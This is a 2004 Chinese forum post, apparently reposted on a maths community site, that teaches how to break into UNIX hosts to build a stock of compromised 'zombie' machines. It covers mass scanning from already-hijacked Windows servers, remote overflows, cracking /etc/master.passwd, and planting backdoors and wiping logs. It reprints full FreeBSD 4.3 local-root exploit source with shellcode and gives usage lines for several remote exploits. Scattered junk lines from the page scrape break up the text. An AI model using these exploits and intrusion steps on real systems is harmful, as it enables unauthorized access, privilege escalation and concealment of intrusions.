数学建模社区-数学中国
标题:
如何寻找自己的UNIX肉鸡
[打印本页]
作者:
韩冰
时间:
2004-10-5 18:33
标题:
如何寻找自己的UNIX肉鸡
今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。
9 G) \6 Z) |% R" w- z1 Z
不罗嗦,直入正题。为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)
% z. d- H# F7 a2 I! z
( b7 \! u* R5 k: G7 U- A s: O+ z
这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣。建议大家推广 :)
: e7 ~2 Q8 o2 B5 o/ _' i% _
下面我们开始工作。由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载。或者直接去大鹰的主页(e4gle.org)或者红客技术联盟(www.cnhonker.net/old.php)下载,注意了,要一起下那个cygwin1.dll的文件,不然搞不成。
3 s8 q; M7 x( I4 N; u5 @& H
现在我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时候,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描
( Y# V$ `: U4 D& g, C
7 v3 n0 r9 K( [2 Y+ C
; u5 M. A- D& Q0 m4 k
我们看到有一台freebsd,这个系统比较好欺负,因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型.如下
$ t' e6 L5 z5 c" ^
' ?+ Q% L. V. ], C( Q
我们扫到了两台linux,….. ..#..’是linux的判断符.
( R/ l! P4 x9 X; t' V% d9 V; S. I
……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了.
8 U9 K- u+ G, I" g. _
" d! ^, \% D4 d& F
$ q1 ]1 k( G0 `! s* B9 A! d6 E0 x0 {
言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了。
/ J7 t# {- E, O/ z) f
8 L$ N( j- _4 q9 ^; l
由于要发送16M的东西,所以可能会慢点
0 P: \, J# t% E; h1 ~- p, D, L
等到成功后,会出现 command ?
* q/ N( E# X, C% o4 s& D
这是输入 id
! {7 h& v5 y7 Q1 D
可以看到自己已经成为root了。当然,大家还可以把shadow抓下来,bsd下的sh
7 V$ A8 v* u; m: J
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号一般比较难破),再进行本地溢出。为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ,然后按着提示做就可以了,bsd系统很稳定,很多大型网站都是用这个建站,比如红盟。本地溢出的代码我在这里贴一下
+ R s. t" Z6 ]' W. w0 I" N8 Q6 a
# }8 a3 {- q/ w7 Y* M
?受影响版本: FreeBSD 4.3 4.2 4.1 4.0
5 S& h" u2 Z `- H3 z
早期版本也许受影响 测试程序使用方法: </P>
; \& U8 n1 q/ H" m( g" I
netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # </P>
; y6 a5 D9 S/ _" K! Q; q5 ^
发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。 </P>
3 I+ _& l6 l* S% j8 V: N9 G2 l
题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞,本地攻击者能取得 root 权限。 vvfreebsd.c
2 V4 G- I# g" u9 k# _1 f9 F
) b* j/ y$ [+ b
???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tm
( T8 N' h3 |- ^; Z7 w' e# C3 g" N
p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
# v6 _7 c7 V. M$ a
); while(42); } </P>
; Z( y2 M$ t/ [. ~2 v
/* www.xcode.tw.st 极端网络安全小组 */
. M4 \& O0 H" v
) Y8 W! M* Q I' N! Z
) Q+ t0 F' |2 Z9 w
可以找到可写的地方,然后cat >vv.c 回车
, h1 K* x" Z6 Q+ r% F
(鼠标右健粘贴)
/ D' @3 \# P8 _$ ^5 a
ctrl + d保存
& y! g8 l) t- \: r4 B. H
$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
0 u4 M4 Q) r' i+ K; v5 l
$cp /bin/csh /tmp
$ k% |. ^' J! Q5 a/ S
$./vv
! W+ f1 ^% \$ ]$ h L
这样就执行了,一般可以得到root.注意第二句,这是代码的需要
9 r8 p% a8 V- n, i! e N! \# ~
然后就去adduser然后再放一堆后门上去吧
/ P9 y+ U, ]) \9 ?$ @, _
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了
+ c; h/ h9 v/ ~2 C! Z, T: ^
2
% K0 V+ Y, d! B: [0 c; G
.Whereis gcc查看装了gcc没有,whereis的用法很灵活
5 v3 `8 l. W* _+ t
3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务)
, e# Q+ V! N# {' Q* H* z
4记得每次上去要用wipe清理足迹,wipe在小凤居有下载
4 q1 I8 r5 B1 n* _4 k! @, G( D
</P>
& ~1 b1 J; W+ [( a/ R, J& G
另外再附几种常见的exploit的用法
+ Q4 T# j+ m* {
3 i, n" B3 ?# t
u1 \4 S# h; r+ H* ~& c
目标主机一律用128.0.0.1代替! 1 statdu[vdp]redhat6.xrpc status远程溢出! </P>
. b. ?" V! X F
溢出程序: statdx 用法: </P>
3 i! a3 p" k. B5 k5 O; |4 P& Q+ r K
./statdx -d 0 128.0.0.1或者 </P>
1 v0 o: ` z/ A9 }, e8 [
./statdx -d 1 128.0.0.1或者 </P>
2 `6 A$ V; O. G- ^) F
./statdx -d 2 128.0.0.1 </P>
. Z. F0 h3 Q( V% c- X/ G
2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 </P>
% E& R1 w9 d0 [2 n! l2 O
溢出程序: sadmindxbrute 用法 </P>
0 T# n2 M: B! ]+ j) E
./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出 </P>
1 _" ^8 o6 }' O7 p1 H/ i
所用程序 ttds(已经改名)流光iv的exploit内可以找到 </P>
! l1 D: S( T0 B4 ^ n6 l
用法: ./ttds 128.0.0.1 80(攻击断口设置为80)-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 </P>
. b- M5 A3 Z" W p9 }& c
所用程序 snmpxmid </P>
" I; ]0 A! D7 D" r
用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 </P>
, B: E6 n5 Z; ~; _
程序bind </P>
' f3 }9 W! @, X1 Y- p
用法: ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个可能用流光iv扫描不到) </P>
8 I. A- H& o+ T; V( U/ ]8 |
所用程序telnetd </P>
) p7 b) |. L8 @# v
用法: ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell </P>
/ ?) P3 ~* u$ h j) M
所用程序 utofsd </P>
) o5 L# @+ ?: R) {+ s
用法: ./utofsd 128.0.0.1 8 freebsd远程溢出 </P>
! a* F! T: |9 O+ ^& W! Q
这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了!
/ L% @* P- x* }5 h0 s( H' g8 t
^$ }+ S/ d: C$ z5 W( S4 N
补充一点,很多写exploit的牛人为了让自己的exploit给真正的黑客用,故意在代码里放了几个错误,所以大家还是要学好编程的这样,就可以根据gcc编译器的错误提示把错误的代码改过来。今天我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很疯狂,用superscan一次一般是扫255个c段用languard也扫的很多,所以建议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏! </P>
欢迎光临 数学建模社区-数学中国 (http://www.madio.net/)
Powered by Discuz! X2.5